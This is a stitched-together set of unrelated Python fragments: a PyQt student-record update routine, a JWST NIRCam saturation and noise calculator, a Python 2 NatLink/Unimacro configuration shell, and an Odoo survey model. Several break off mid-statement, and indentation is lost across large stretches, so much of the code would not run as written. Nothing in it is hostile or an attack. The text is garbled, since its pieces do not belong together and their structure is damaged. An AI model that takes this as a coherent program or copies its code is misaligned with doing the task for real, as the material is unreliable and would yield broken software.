                std_nb += classe.Class.getNumberOfStudentInThisClassroomById(
                    self.list_room_id[id])
            self.model.setHorizontalHeaderLabels(
                QStringList(u"Elèves - Nom et prenoms (%i)" % std_nb))
        # Refresh the statistics panes.
        self.stat_page.stat_object_tree.updateStatObjectTree()
        self.stat_page.stat_feature_tree.clear()
        self.stat_page.stat_feature_tree.setHeaderLabel(u"")
        child = self.stat_page.stat_output.layout.takeAt(0)
        if child:
            child.widget().deleteLater()
def editStudentItem(self, infos):
ayid = infos['ay_id']
clid = infos['class_id']
crid = infos['classroom_id']
stid = infos['student_id']
mark_data = infos['mark_data']
away_data = infos['away_data']
current_item = infos['item']
query = QSqlQuery()
query.prepare("UPDATE student \
SET student_first_name = :first_name, \
student_last_name = :last_name, \
student_birth_date = :birth_date, \
student_birth_place = :birth_place, \
student_genre = :genre, \
student_height = :height, \
student_matricule = :matricule, \
student_matricule_ministeriel = :matricule_ministeriel, \
student_statut = :statut, \
student_previous_school = :previous_school, \
student_previous_classroom = :previous_classroom, \
student_redoubler = :redoubler, \
student_email = :email, \
student_phone1 = :phone1, \
student_phone2 = :phone2, \
student_phone3 = :phone3, \
student_photo_name = :photo_name, \
student_updated_at | |
None:
sp = stellar_spectrum('G2V')
# Just for good measure, make sure we're all in the same wave units
bp_lim.convert(bp.waveunits)
sp.convert(bp.waveunits)
# Renormalize to 10th magnitude star (Vega mags)
mag_norm = 10.0
sp_norm = sp.renorm(mag_norm, 'vegamag', bp_lim)
sp_norm.name = sp.name
# Set up an observation of the spectrum using the specified bandpass
# Use the bandpass wavelengths to bin the fluxes
obs = S.Observation(sp_norm, bp, binset=bp.wave)
# Convert observation to counts (e/sec)
obs.convert('counts')
# The number of pixels to span spatially
fov_pix = int(fov_pix)
oversample = int(oversample)
# Generate the PSF image for analysis
t0 = time.time()
result = gen_image_coeff(bp, pupil=pupil, mask=mask, module=module,
sp_norm=sp_norm, coeff=coeff, coeff_hdr=coeff_hdr,
fov_pix=fov_pix, oversample=oversample,
offset_r=offset_r, offset_theta=offset_theta, **kwargs)
t1 = time.time()
_log.debug('Took %.2f seconds to generate images' % (t1-t0))
# Total stellar flux and associated magnitude
star_flux = obs.countrate() # e/sec
mag_nrc = obs.effstim('vegamag')
_log.debug('Total Source Count Rate for {0} = {1:0.1f} mags: {2:.0f} e-/sec'.\
format(bp_lim.name, mag_norm, star_flux))
_log.debug('Magnitude in {0} band: {1:.2f}'.format(bp.name, mag_nrc))
# Saturation level (some fraction of full well) in electrons
sat_level = well_frac * full_well
# If grism spectroscopy
if (pupil is not None) and ('GRISM' in pupil):
wspec, spec = result
# Time to saturation for 10-mag source
sat_time = sat_level / spec
_log.debug('Approximate Time to {1:.2f} of Saturation: {0:.1f} sec'.\
format(sat_time.min(),well_frac))
# Magnitude necessary to saturate a given pixel
ratio = int_time/sat_time
ratio[ratio < __epsilon] = __epsilon
sat_mag = mag_norm + 2.5*np.log10(ratio)
# Wavelengths to grab saturation values
igood2 = bp.throughput > (bp.throughput.max()/4)
wgood2 = bp.wave[igood2] / 1e4
wsat_arr = np.unique((wgood2*10 + 0.5).astype('int')) / 10
wdel = wsat_arr[1] - wsat_arr[0]
msat_arr = []
for w in wsat_arr:
l1 = w-wdel/4
l2 = w+wdel/4
ind = ((wspec > l1) & (wspec <= l2))
msat = sat_mag[fov_pix//2-1:fov_pix//2+2,ind].max()
sp_temp = sp.renorm(msat, 'vegamag', bp_lim)
obs_temp = S.Observation(sp_temp, bp_lim, binset=bp_lim.wave)
msat_arr.append(obs_temp.effstim(units))
msat_arr = np.array(msat_arr)
# Print verbose information
if not quiet:
if bp_lim.name == bp.name:
print('{0} Saturation Limit assuming {1} source:'.\
format(bp_lim.name,sp.name))
else:
print('{0} Saturation Limit for {1} assuming {2} source:'.\
format(bp_lim.name,bp.name,sp.name))
names = ('Wave','Sat Limit ({})'.format(units))
tbl = Table([wsat_arr,msat_arr], names=names)
for k in tbl.keys():
tbl[k].format = '9.2f'
print(tbl)
# Return saturation list along with corresponding wavelengths to dictionary
return {'wave':wsat_arr.tolist(), 'satmag':msat_arr.tolist(),
'units':units, 'Spectrum':sp_norm.name, 'bp_lim':bp_lim.name}
# DHS spectroscopy
elif (pupil is not None) and ('DHS' in pupil):
raise NotImplementedError
# Imaging
else:
psf = result
# Time to saturation for 10-mag source
# Only need the maximum pixel value
sat_time = sat_level / psf.max()
_log.debug('Point source approximate Time to {1:.2f} of Saturation: {0:.2f} sec'.\
format(sat_time,well_frac))
# Magnitude necessary to saturate a given pixel
ratio = int_time/sat_time
sat_mag = mag_norm + 2.5*np.log10(ratio)
# Convert to desired unit
sp_temp = sp.renorm(sat_mag, 'vegamag', bp_lim)
obs_temp = S.Observation(sp_temp, bp_lim, binset=bp_lim.wave)
res1 = obs_temp.effstim(units)
out1 = {'satlim':res1, 'units':units, 'bp_lim':bp_lim.name, 'Spectrum':sp_norm.name}
# For surface brightness saturation (extended object)
# Assume the fiducial (sp_norm) to be in terms of mag/arcsec^2
# Multiply countrate() by pix_scale^2 to get in terms of per pixel (area)
# This is the count rate per pixel for the fiducial starting point
image_ext = obs.countrate() * pix_scale**2 # e-/sec/pixel
sat_time = sat_level / image_ext
_log.debug('Extended object approximate Time to {1:.2f} of Saturation: {0:.2f} sec'.\
format(sat_time,well_frac))
# Magnitude necessary to saturate a given pixel
ratio = int_time / sat_time
sat_mag_ext = mag_norm + 2.5*np.log10(ratio)
# Convert to desired unit
sp_temp = sp.renorm(sat_mag_ext, 'vegamag', bp_lim)
obs_temp = S.Observation(sp_temp, bp_lim, binset=bp_lim.wave)
res2 = obs_temp.effstim(units)
out2 = out1.copy()
out2['satlim'] = res2
out2['units'] = units+'/arcsec^2'
# Print verbose information
if not quiet:
if bp_lim.name == bp.name:
print('{} Saturation Limit assuming {} source (point source): {:.2f} {}'.\
format(bp_lim.name, sp_norm.name, out1['satlim'], out1['units']) )
print('{} Saturation Limit assuming {} source (extended): {:.2f} {}'.\
format(bp_lim.name, sp_norm.name, out2['satlim'], out2['units']) )
else:
print('{} Saturation Limit for {} assuming {} source (point source): {:.2f} {}'.\
format(bp_lim.name, bp.name, sp_norm.name, out1['satlim'], out1['units']) )
print('{} Saturation Limit for {} assuming {} source (extended): {:.2f} {}'.\
format(bp_lim.name, bp.name, sp_norm.name, out2['satlim'], out2['units']) )
return out1, out2
def var_ex_model(ng, nf, params):
    """Empirical model of the excess variance observed in effective
    noise measurements of a MULTIACCUM ramp.

    Parameters
    ----------
    ng : int or ndarray
        Number of groups in the integration ramp.
    nf : int or ndarray
        Number of frames averaged per group.
    params : sequence of two floats
        Amplitude parameters of the excess-noise model.
    """
    ramp_factor = 12. * (ng - 1.) / (ng + 1.)
    return ramp_factor * params[0]**2 - params[1] / nf**0.5
def pix_noise(ngroup=2, nf=1, nd2=0, tf=10.73677, rn=15.0, ktc=29.0, p_excess=(0,0),
fsrc=0.0, idark=0.003, fzodi=0, fbg=0, ideal_Poisson=False,
ff_noise=False, **kwargs):
"""Noise per pixel
Theoretical noise calculation of a generalized MULTIACCUM ramp in terms of e-/sec.
Includes flat field errors from JWST-CALC-003894.
Parameters
----------
    ngroup : int
        Number of groups in integration ramp.
    nf : int
        Number of frames averaged in each group.
    nd2 : int
        Number of dropped frames in each group.
    tf : float
        Frame time.
    rn : float
        Read Noise per pixel (e-).
    ktc : float
        kTC noise (in e-). Only valid for single frame (ngroup=1).
p_excess : array-like
An array or list of two elements that holds the parameters
describing the excess variance observed in effective noise plots.
By default these are both 0. For NIRCam detectors, recommended
values are [1.0,5.0] for SW and [1.5,10.0] for LW.
fsrc : float
Flux of source in e-/sec/pix.
idark : float
Dark current in e-/sec/pix.
fzodi : float
Zodiacal light emission in e-/sec/pix.
fbg : float
Any additional background (telescope emission or scattered light?)
ideal_Poisson : bool
If set to True, use total signal for noise estimate,
otherwise MULTIACCUM equation is used.
ff_noise : bool
Include flat field errors in calculation? From JWST-CALC-003894.
Default=False.
Notes
-----
Various parameters can either be single values or numpy arrays.
If multiple inputs are arrays, make sure their array sizes match.
Variables that need to have the same array shapes (or a single value):
- n, m, s, & tf
- rn, idark, ktc, fsrc, fzodi, & fbg
Array broadcasting also works.
Example
-------
>>> n = np.arange(50)+1 # An array of different ngroups to test out
>>> # Create 2D Gaussian PSF with FWHM = 3 pix
>>> npix = 20 # Number of pixels in x and y direction
>>> fwhm = 3.0
>>> x = np.arange(0, npix, 1, dtype=float)
>>> y = x[:,np.newaxis]
>>> x0 = y0 = npix // 2 # Center position
>>> fsrc = np.exp(-4*np.log(2.) * ((x-x0)**2 + (y-y0)**2) / fwhm**2)
>>> fsrc /= fsrc.max()
>>> fsrc *= 10 # 10 counts/sec in peak pixel
>>> fsrc = fsrc.reshape(npix,npix,1) # Necessary for broadcasting
>>> # Represents pixel array w/ slightly different RN/pix
>>> rn = 15 + np.random.normal(loc=0, scale=0.5, size=(1,npix,npix))
>>> # Results is a 50x(20x20) showing the noise in e-/sec/pix at each group
>>> noise = pix_noise(ngroup=n, rn=rn, fsrc=fsrc)
"""
# Convert everything to arrays
n = np.array(ngroup)
m = np.array(nf)
s = np.array(nd2)
tf = np.array(tf)
# Total flux (e-/sec/pix)
ftot = fsrc + idark + fzodi + fbg
# Special case if n=1
# To be inserted at the end
if (n==1).any():
# Variance after averaging m frames
var = ktc**2 + (rn**2 + ftot*tf) / m
noise = np.sqrt(var)
noise /= tf # In terms of e-/sec
if (n==1).all(): return noise
noise_n1 = noise
ind_n1 = (n==1)
temp = np.array(rn+ktc+ftot)
temp_bool = np.zeros(temp.shape, dtype=bool)
ind_n1_all = (temp_bool | ind_n1)
# Group time
tg = tf * (m + s)
# Effective integration time
tint = tg * (n - 1)
# Read noise, group time, and frame time variances
# This is the MULTIACCUM eq from Rauscher et al. (2007).
# This equation assumes that the slope-fitting routine uses
# incorrect covariance matrix that doesn't take into account
# the correlated Poisson noise up the ramp.
var_rn = rn**2 * 12. * (n - 1.) / (m * n * (n + 1.))
var_gp = ftot * tint * 6. * (n**2. + 1.) / (5 * n * (n + 1.))
var_fm = ftot * tf * 2. * (m**2. - 1.) * (n - 1.) / (m * n * (n + 1.))
# Functional form for excess variance above theoretical
# Empirically measured formulation
# var_ex = | |
help_n
# Unimacro User directory and Editor or Unimacro INI files-----------------------------------
def do_o(self, arg):
arg = self.stripCheckDirectory(arg) # also quotes
if not arg:
return
self.config.setUnimacroUserDir(arg)
def do_O(self, arg):
self.message = "Clearing Unimacro user directory, and disable Unimacro"
print 'do action: %s'% self.message
self.config.clearUnimacroUserDir()
def help_o(self):
print '-'*60
userDir = self.config.getUserDirectory()
print \
"""set/clear UnimacroUserDirectory (o <path>/O)
And enable/disable Unimacro.
In this directory, your user INI files (and possibly other user
dependent files) will be put.
You can use (if entered through the CLI) "~" (or %%HOME%%) for user home directory, or
another environment variable (%%...%%). (example: "o ~\NatLink\Unimacro")
Setting this directory also enables Unimacro. Clearing it disables Unimacro
"""
print '='*60
help_O = help_o
# Unimacro Command Files Editor-----------------------------------------------
def do_p(self, arg):
if os.path.isfile(arg) and arg.endswith(".exe"):
self.message = "Setting (path to) Unimacro INI Files editor to %s"% arg
print 'do action: %s'% self.message
self.config.setUnimacroIniFilesEditor(arg)
else:
print 'Please specify a valid path for the Unimacro INI files editor, not |%s|'% arg
def do_P(self, arg):
self.message = "Clear Unimacro INI file editor, go back to default Notepad"
print 'do action: %s'% self.message
self.config.clearUnimacroIniFilesEditor()
def help_p(self):
print '-'*60
print \
"""set/clear path to Unimacro INI files editor (p <path>/P)
By default (when you clear this setting) "notepad" is used, but:
You can specify a program you like, for example,
TextPad, NotePad++, UltraEdit, or win32pad
You can even specify Wordpad, maybe Microsoft Word...
"""
print '='*60
help_P = help_p
# Unimacro Vocola features-----------------------------------------------
# managing the include file wrapper business.
# can be called from the Vocola compatibility button in the config GUI.
def do_l(self, arg):
    # Copy the Unimacro.vch header file into the Vocola user directory so
    # Vocola commands can call Unimacro shorthand commands (see help_l).
    self.message = "Copy include file Unimacro.vch into Vocola User Directory"
    print 'do action: %s'% self.message
    self.config.copyUnimacroIncludeFile()

def help_l(self):
    print '-'*60
    print \
"""Copy Unimacro.vch header file into Vocola User Files directory (l)
Insert/remove 'include Unimacro.vch' lines into/from each Vocola
command file (m/M)
Using Unimacro.vch, you can call Unimacro shorthand commands from a
Vocola command.
"""
    print '='*60

def do_m(self, arg):
    # Add the 'include Unimacro.vch' line to every Vocola command file.
    self.message = 'Insert "include Unimacro.vch" line in each Vocola Command File'
    print 'do action: %s'% self.message
    self.config.includeUnimacroVchLineInVocolaFiles()

def do_M(self, arg):
    # Remove the 'include Unimacro.vch' line from every Vocola command file.
    self.message = 'Remove "include Unimacro.vch" line from each Vocola Command File'
    print 'do action: %s'% self.message
    self.config.removeUnimacroVchLineInVocolaFiles()

# m and M share the l help text, which documents all three commands.
help_m = help_M = help_l
# enable/disable NatLink------------------------------------------------
def do_e(self, arg):
self.message = "Enabling NatLink:"
print 'do action: %s'% self.message
self.config.enableNatlink()
def do_E(self, arg):
self.message = "Disabling NatLink:"
self.config.disableNatlink()
def help_e(self):
print '-'*60
print \
"""Enable NatLink (e) or disable NatLink (E):
When you enable NatLink, the necessary settings in nssystem.ini and nsapps.ini
are done.
These options require elevated mode and probably Dragon be closed.
After you restart %s, NatLink should start, opening a window titled
'Messages from NatLink - ...'.
When you enable NatLink, the file natlink.pyd is (re)registered silently. Use
the commands r/R to register/unregister natlink.pyd explicitly.
(see help r, but most often not needed)
When you disable NatLink, the necessary settings in nssystem.ini and nsapps.ini
are cleared.
After you restart %s, NatLink should NOT START ANY MORE
so the window 'Messages from NatLink' is NOT OPENED.
Note: when you disable NatLink, the natlink.pyd file is NOT unregistered.
It is not called any more by %s, as its declaration is removed from
the Global Clients section of nssystem.ini.
"""% (self.DNSName, self.DNSName, self.DNSName)
print "="*60
help_E = help_e
# Vocola and Vocola User directory------------------------------------------------
def do_v(self, arg):
if not arg:
self.message = "do_v should have an argument"
return
tryPath = self.config.isValidPath(arg)
if not tryPath:
self.message = "do_v, not a valid path: %s"% arg
return
self.message = 'Set VocolaUserDirectory to "%s" and enable Vocola'% arg
print 'do action: %s'% self.message
self.config.setVocolaUserDir(arg)
def do_V(self, arg):
self.message = "Clear VocolaUserDirectory and (therefore) disable Vocola"
print 'do action: %s'% self.message
self.config.clearVocolaUserDir()
def help_v(self):
print '-'*60
print \
"""Enable/disable Vocola by setting/clearing the VocolaUserDirectory
(v <path>/V).
In this VocolaUserDirectory your Vocola Command File are/will be located.
<path> must be an existing folder; NatLink\Vocola in My Documents is a
popular choice.
You may have to manually create this folder first.
"""
print '='*60
help_V = help_v
# Vocola Command Files Editor-----------------------------------------------
## def do_w(self, arg):
## if os.path.isfile(arg) and arg.endswith(".exe"):
## print "Setting Setting Vocola Command Files editor to %s"% arg
## self.config.setVocolaCommandFilesEditor(arg)
## else:
## print 'Please specify a valid path for Vocola command files editor: |%s|'% arg
##
## def do_W(self, arg):
## print "Clear Vocola commands file editor, go back to default notepad"
## self.config.clearVocolaCommandFilesEditor()
##
## def help_w(self):
## print '-'*60
## print \
##"""set/clear Vocola command files editor (w path/W)
##
##By default the editor "notepad" is used.
##
##You can specify a program you like, for example,
##TextPad, NotePad++, UltraEdit, or win32pad.
##
##"""
##
## print '='*60
##
## help_W = help_w
## testing:
def do_s(self, arg):
pydPath = r"C:\natlink\natlink\macrosystem\core\natlink.pyd"
print 'registered?: %s'% self.config.PydIsRegistered(pydPath)
pass
def do_g(self, arg):
print 'no valid option'
pass
def do_G(self, arg):
print 'no valid option'
def help_g(self):
print '-'*60
print \
"""not a valid option
"""
print '='*60
help_G = help_g
# enable/disable NatLink debug output...
def do_x(self, arg):
    # Turn on natlinkmain debugLoad output (see help_x).
    self.message = 'Enable natlinkmain giving debugLoad output to "Messages from Natlink" window'
    print 'do action: %s'% self.message
    self.config.enableDebugLoadOutput()

def do_X(self, arg):
    # Turn off natlinkmain debugLoad output.
    self.message = 'Disable natlinkmain giving debugLoad output to "Messages from Natlink" window'
    print 'do action: %s'% self.message
    self.config.disableDebugLoadOutput()

# enable/disable NatLink debug output...
def do_y(self, arg):
    # Turn on natlinkmain debugCallback output (see help_x).
    self.message = 'Enable natlinkmain giving debugCallback output to "Messages from Natlink" window'
    print 'do action: %s'% self.message
    self.config.enableDebugCallbackOutput()

def do_Y(self, arg):
    # Turn off natlinkmain debugCallback output.
    self.message = 'Disable natlinkmain giving debugCallback output to messages of "Messages from Natlink" window'
    print 'do action: %s'% self.message
    self.config.disableDebugCallbackOutput()

def help_x(self):
    print '-'*60
    print \
"""Enable (x)/disable (X) natlinkmain debug load output
Enable (y)/disable (Y) natlinkmain debug callback output
Nearly obsolete options.
This sends sometimes lengthy debugging messages to the
"Messages from NatLink" window.
Mainly used when you suspect problems with the working
of NatLink, so keep off (X and Y) most of the time.
"""
    print '='*60

# one shared help text documents all four debug-output commands
help_y = help_x
help_X = help_x
help_Y = help_x
# register natlink.pyd
def do_r(self, arg):
    # (Re)register natlink.pyd and re-enable NatLink. Only runs when the
    # process is elevated; otherwise an ElevationError carrying the intended
    # action message is raised.
    self.message = "(Re) register and enable natlink.pyd"
    if self.config.isElevated:
        print 'do action: %s'% self.message
        # NOTE(review): isRegistered is currently unused; it feeds the
        # historical hint block kept commented out below.
        isRegistered = self.config.userregnl.get("NatlinkPydRegistered")
        #if isRegistered:
        #    print "If you have problems re-registering natlink.pyd, please try the following:"
        #    print "Un-register natlink.pyd first, then"
        #    print "If you want to try a new natlink.pyd, first exit this program,"
        #    print "Remove %s\\natlink.pyd"% coreDir
        #    print "and restart (in elevated mode) this program."
        #    print "The correct python version of natlink.pyd will be copied to natlink.pyd"
        #    print "and it will be registered again."
        #    return
        if not self.config.removeNatlinkPyd():
            return
        self.config.configCheckNatlinkPydFile()
        self.config.enableNatlink()
    else:
        raise ElevationError(self.message)
#
#
#self.config.registerNatlinkPyd(silent=None)
def do_R(self, arg):
    # Unregister natlink.pyd and disable NatLink; requires an elevated
    # process, otherwise an ElevationError is raised.
    self.message = "Unregister natlink.pyd and disable NatLink"
    # if self.isNatSpeakRunning(): raise NatSpeakRunningError("Probably needed before you can unregister natlink.pyd")
    if self.config.isElevated:
        self.config.disableNatlink(silent=1)
        self.config.unregisterNatlinkPyd(silent=None)
    else:
        raise ElevationError(self.message)
def do_z(self, arg):
    """register silent and enable NatLink"""
    # Silent variant of do_r: no elevation check, no 'do action' message.
    # if self.isNatSpeakRunning(): raise NatSpeakRunningError("Probably needed before you can register natlink.pyd")
    if not self.config.removeNatlinkPyd():
        return
    self.config.configCheckNatlinkPydFile()
    self.config.enableNatlink()

def do_Z(self, arg):
    """(SILENT) Unregister natlink.pyd and disable NatLink"""
    # Silent variant of do_R: no elevation check, silent=1 everywhere.
    # if self.isNatSpeakRunning(): raise NatSpeakRunningError("Probably needed before you can unregister natlink.pyd")
    self.config.disableNatlink(silent=1)
    self.config.unregisterNatlinkPyd(silent=1)
def help_r(self):
    # Shared help text for the r/R (explicit) and z/Z (silent)
    # register/unregister commands.
    print '-'*60
    print \
"""Registers (r) / unregisters (R) natlink.pyd explicitly.
Registering is also done (silently) when you start this program or the
configuration GUI the first time, so this option should only be needed in rare cases.
But if you do (-r or -R) a message dialog shows up to inform you what happened.
When you unregister, NatLink is also disabled.
When you want to try a new version of natlink.pyd, take the following steps:
-close Dragon
-remove natlink.pyd (in the MacroSystem/core directory of NatLink)
-rerun this program or the configure program in elevated mode.
The correct version of natlink.pyd (corresponding with your python version 2.6, 2.7 (2.5 for pre Dragon 12)
will be copied to this name and registered. In the log panel of the configure GUI the steps will show the result.
-restart Dragon.
If you want to (silently) enable NatLink and register silently use -z,
To disable NatLink and unregister (silently) use Z
"""
    print '='*60

help_R = help_r
help_z = help_r
help_Z = help_r
# different Vocola options
def do_b(self, arg):
self.message = "Enable Vocola different user directories for different languages"
print 'do action: | |
# -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
import json
import random
import uuid
import werkzeug
from odoo import api, exceptions, fields, models, _
from odoo.exceptions import AccessError
from odoo.osv import expression
from odoo.tools import is_html_empty
class Survey(models.Model):
""" Settings for a multi-page/multi-question survey. Each survey can have one or more attached pages
and each page can display one or more questions. """
_name = 'survey.survey'
_description = 'Survey'
_rec_name = 'title'
_inherit = ['mail.thread', 'mail.activity.mixin']
def _get_default_access_token(self):
    """Return a fresh random UUID4 string used as the survey access token."""
    token = uuid.uuid4()
    return str(token)
def _get_default_session_code(self):
    """ Attempt to generate a session code for our survey.
    The method will first try to generate 20 codes with 4 digits each and check if any are colliding.
    If we have at least one non-colliding code, we use it.
    If all 20 generated codes are colliding, we try with 20 codes of 5 digits,
    then 6, ... up to 10 digits. """
    # Fix: range() excludes its upper bound, so the original range(4, 10)
    # stopped at 9-digit codes; use 11 to actually try 10 digits as documented.
    for digits_count in range(4, 11):
        range_lower_bound = 10 ** (digits_count - 1)
        range_upper_bound = (range_lower_bound * 10) - 1  # randint bounds are inclusive
        code_candidates = {str(random.randint(range_lower_bound, range_upper_bound)) for _ in range(20)}
        colliding_codes = self.sudo().search_read(
            [('session_code', 'in', list(code_candidates))],
            ['session_code']
        )
        code_candidates -= {colliding_code['session_code'] for colliding_code in colliding_codes}
        if code_candidates:
            # any surviving candidate is fine; sets are unordered just like
            # the original list(...)[0] pick
            return code_candidates.pop()
    return False  # could not generate a code
# description
title = fields.Char('Survey Title', required=True, translate=True)
color = fields.Integer('Color Index', default=0)
description = fields.Html(
    "Description", translate=True, sanitize=False,  # TDE FIXME: find a way to authorize videos
    help="The description will be displayed on the home page of the survey. You can use this to give the purpose and guidelines to your candidates before they start it.")
description_done = fields.Html(
    "End Message", translate=True,
    help="This message will be displayed when survey is completed")
background_image = fields.Binary("Background Image")
active = fields.Boolean("Active", default=True)
state = fields.Selection(selection=[
    ('draft', 'Draft'), ('open', 'In Progress'), ('closed', 'Closed')
], string="Survey Stage", default='draft', required=True,
    group_expand='_read_group_states')
# questions
# question_and_page_ids mixes section ("page") records and question records;
# the two computed one2many below split them (see _compute_page_and_question_ids).
question_and_page_ids = fields.One2many('survey.question', 'survey_id', string='Sections and Questions', copy=True)
page_ids = fields.One2many('survey.question', string='Pages', compute="_compute_page_and_question_ids")
question_ids = fields.One2many('survey.question', string='Questions', compute="_compute_page_and_question_ids")
questions_layout = fields.Selection([
    ('one_page', 'One page with all the questions'),
    ('page_per_section', 'One page per section'),
    ('page_per_question', 'One page per question')],
    string="Layout", required=True, default='one_page')
questions_selection = fields.Selection([
    ('all', 'All questions'),
    ('random', 'Randomized per section')],
    string="Selection", required=True, default='all',
    help="If randomized is selected, you can configure the number of random questions by section. This mode is ignored in live session.")
progression_mode = fields.Selection([
    ('percent', 'Percentage'),
    ('number', 'Number')], string='Progression Mode', default='percent',
    help="If Number is selected, it will display the number of questions answered on the total number of question to answer.")
# attendees
user_input_ids = fields.One2many('survey.user_input', 'survey_id', string='User responses', readonly=True, groups='survey.group_survey_user')
# security / access
access_mode = fields.Selection([
    ('public', 'Anyone with the link'),
    ('token', 'Invited people only')], string='Access Mode',
    default='public', required=True)
access_token = fields.Char('Access Token', default=lambda self: self._get_default_access_token(), copy=False)
users_login_required = fields.Boolean('Login Required', help="If checked, users have to login before answering even with a valid token.")
users_can_go_back = fields.Boolean('Users can go back', help="If checked, users can go back to previous pages.")
users_can_signup = fields.Boolean('Users can signup', compute='_compute_users_can_signup')
# statistics (all computed together in _compute_survey_statistic)
answer_count = fields.Integer("Registered", compute="_compute_survey_statistic")
answer_done_count = fields.Integer("Attempts", compute="_compute_survey_statistic")
answer_score_avg = fields.Float("Avg Score %", compute="_compute_survey_statistic")
success_count = fields.Integer("Success", compute="_compute_survey_statistic")
success_ratio = fields.Integer("Success Ratio", compute="_compute_survey_statistic")
# scoring
scoring_type = fields.Selection([
    ('no_scoring', 'No scoring'),
    ('scoring_with_answers', 'Scoring with answers at the end'),
    ('scoring_without_answers', 'Scoring without answers at the end')],
    string="Scoring", required=True, default='no_scoring')
scoring_success_min = fields.Float('Success %', default=80.0)
# attendees context: attempts and time limitation
is_attempts_limited = fields.Boolean('Limited number of attempts', help="Check this option if you want to limit the number of attempts per user",
    compute="_compute_is_attempts_limited", store=True, readonly=False)
attempts_limit = fields.Integer('Number of attempts', default=1)
is_time_limited = fields.Boolean('The survey is limited in time')
time_limit = fields.Float("Time limit (minutes)", default=10)
# certification
certification = fields.Boolean('Is a Certification', compute='_compute_certification',
    readonly=False, store=True)
certification_mail_template_id = fields.Many2one(
    'mail.template', 'Email Template',
    domain="[('model', '=', 'survey.user_input')]",
    help="Automated email sent to the user when he succeeds the certification, containing his certification document.")
certification_report_layout = fields.Selection([
    ('modern_purple', 'Modern Purple'),
    ('modern_blue', 'Modern Blue'),
    ('modern_gold', 'Modern Gold'),
    ('classic_purple', 'Classic Purple'),
    ('classic_blue', 'Classic Blue'),
    ('classic_gold', 'Classic Gold')],
    string='Certification template', default='modern_purple')
# Certification badge
# certification_badge_id_dummy is used to have two different behaviours in the form view :
# - If the certification badge is not set, show certification_badge_id and only display create option in the m2o
# - If the certification badge is set, show certification_badge_id_dummy in 'no create' mode.
# So it can be edited but not removed or replaced.
certification_give_badge = fields.Boolean('Give Badge', compute='_compute_certification_give_badge',
    readonly=False, store=True)
certification_badge_id = fields.Many2one('gamification.badge', 'Certification Badge')
certification_badge_id_dummy = fields.Many2one(related='certification_badge_id', string='Certification Badge ')
# live sessions
session_state = fields.Selection([
    ('ready', 'Ready'),
    ('in_progress', 'In Progress'),
    ], string="Session State", copy=False)
session_code = fields.Char('Session Code', default=lambda self: self._get_default_session_code(), copy=False,
    help="This code will be used by your attendees to reach your session. Feel free to customize it however you like!")
session_link = fields.Char('Session Link', compute='_compute_session_link')
# live sessions - current question fields
session_question_id = fields.Many2one('survey.question', string="Current Question", copy=False,
    help="The current question of the survey session.")
session_start_time = fields.Datetime("Current Session Start Time", copy=False)
session_question_start_time = fields.Datetime("Current Question Start Time", copy=False,
    help="The time at which the current question has started, used to handle the timer for attendees.")
session_answer_count = fields.Integer("Answers Count", compute='_compute_session_answer_count')
session_question_answer_count = fields.Integer("Question Answers Count", compute='_compute_session_question_answer_count')
# live sessions - settings
session_show_leaderboard = fields.Boolean("Show Session Leaderboard", compute='_compute_session_show_leaderboard',
    help="Whether or not we want to show the attendees leaderboard for this survey.")
session_speed_rating = fields.Boolean("Reward quick answers", help="Attendees get more points if they answer quickly")
# conditional questions management
has_conditional_questions = fields.Boolean("Contains conditional questions", compute="_compute_has_conditional_questions")
# Database-level integrity rules enforced by PostgreSQL CHECK/UNIQUE constraints.
_sql_constraints = [
    ('access_token_unique', 'unique(access_token)', 'Access token should be unique'),
    ('session_code_unique', 'unique(session_code)', 'Session code should be unique'),
    ('certification_check', "CHECK( scoring_type!='no_scoring' OR certification=False )",
        'You can only create certifications for surveys that have a scoring mechanism.'),
    ('scoring_success_min_check', "CHECK( scoring_success_min IS NULL OR (scoring_success_min>=0 AND scoring_success_min<=100) )",
        'The percentage of success has to be defined between 0 and 100.'),
    ('time_limit_check', "CHECK( (is_time_limited=False) OR (time_limit is not null AND time_limit > 0) )",
        'The time limit needs to be a positive number if the survey is time limited.'),
    ('attempts_limit_check', "CHECK( (is_attempts_limited=False) OR (attempts_limit is not null AND attempts_limit > 0) )",
        'The attempts limit needs to be a positive number if the survey has a limited number of attempts.'),
    ('badge_uniq', 'unique (certification_badge_id)', "The badge for each survey should be unique!"),
    ('give_badge_check', "CHECK(certification_give_badge=False OR (certification_give_badge=True AND certification_badge_id is not null))",
        'Certification badge must be configured if Give Badge is set.'),
]
def _compute_users_can_signup(self):
    """Flag whether anonymous visitors may sign up (b2c invitation scope)."""
    scope = self.env['res.users'].sudo()._get_signup_invitation_scope()
    allowed = (scope == 'b2c')
    for survey in self:
        survey.users_can_signup = allowed
@api.depends('user_input_ids.state', 'user_input_ids.test_entry', 'user_input_ids.scoring_percentage', 'user_input_ids.scoring_success')
def _compute_survey_statistic(self):
    """Aggregate per-survey answer statistics (counts, average score, success ratio)."""
    default_vals = {
        'answer_count': 0, 'answer_done_count': 0, 'success_count': 0,
        'answer_score_avg': 0.0, 'success_ratio': 0.0
    }
    # answer_score_avg_total is a temporary accumulator, popped before writing.
    stat = dict((cid, dict(default_vals, answer_score_avg_total=0.0)) for cid in self.ids)
    UserInput = self.env['survey.user_input']
    # test entries are excluded from all statistics
    base_domain = ['&', ('survey_id', 'in', self.ids), ('test_entry', '!=', True)]
    read_group_res = UserInput.read_group(base_domain, ['survey_id', 'state'], ['survey_id', 'state', 'scoring_percentage', 'scoring_success'], lazy=False)
    for item in read_group_res:
        stat[item['survey_id'][0]]['answer_count'] += item['__count']
        stat[item['survey_id'][0]]['answer_score_avg_total'] += item['scoring_percentage']
        if item['state'] == 'done':
            stat[item['survey_id'][0]]['answer_done_count'] += item['__count']
        if item['scoring_success']:
            stat[item['survey_id'][0]]['success_count'] += item['__count']
    for survey_id, values in stat.items():
        # `or 1` guards the divisions for surveys without any completed answer
        avg_total = stat[survey_id].pop('answer_score_avg_total')
        stat[survey_id]['answer_score_avg'] = avg_total / (stat[survey_id]['answer_done_count'] or 1)
        stat[survey_id]['success_ratio'] = (stat[survey_id]['success_count'] / (stat[survey_id]['answer_done_count'] or 1.0))*100
    for survey in self:
        # _origin.id handles onchange/new records that have no real id yet
        survey.update(stat.get(survey._origin.id, default_vals))
@api.depends('question_and_page_ids')
def _compute_page_and_question_ids(self):
    """Split the mixed sections/questions one2many into pages vs. questions."""
    for survey in self:
        pages = survey.question_and_page_ids.filtered(lambda record: record.is_page)
        survey.page_ids = pages
